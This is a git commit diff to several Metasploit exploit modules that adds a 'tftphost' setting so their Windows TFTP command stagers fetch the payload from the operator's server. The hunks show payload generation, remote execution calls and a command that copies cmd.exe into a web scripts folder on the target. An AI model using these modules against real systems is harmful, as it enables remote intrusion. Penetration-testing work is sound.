exploits: Set tftphost option for modules which use Windows TFTP stager
This commit is contained in:
parent
6b17905790
commit
bbbec267b6
|
@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def windows_stager
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
|
|
@ -106,7 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
|
|
@ -50,16 +50,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def windows_stager
|
||||
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.', :cgifname => exe_fname })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
|
|
@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def windows_stager
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
|
|
@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def windows_stager
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
|
|
@ -344,7 +344,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
|
||||
|
||||
# Use the CMD stager to get a payload running
|
||||
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
|
||||
|
||||
# Save these file names for later deletion
|
||||
@exe_cmd_copy = exe_fname
|
||||
|
|
|
@ -173,7 +173,8 @@ Processor-Speed=#{processor_speed}
|
|||
# CmdStagerVBS was tested here as well, however delivery took roughly
|
||||
# 30 minutes and required sending almost 350 notification messages.
|
||||
# size constraint requirement for SQLi is: linemax => 393
|
||||
execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
|
|
|
@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
method = datastore['METHOD'].downcase
|
||||
|
||||
if (method =~ /^cmd/)
|
||||
execute_cmdstager({ :linemax => 1500, :nodelete => true })
|
||||
#execute_cmdstager({ :linemax => 1500 })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
|
||||
else
|
||||
# Generate the EXE, this is the same no matter what delivery mechanism we use
|
||||
exe = generate_payload_exe
|
||||
|
|
Loading…
Reference in New Issue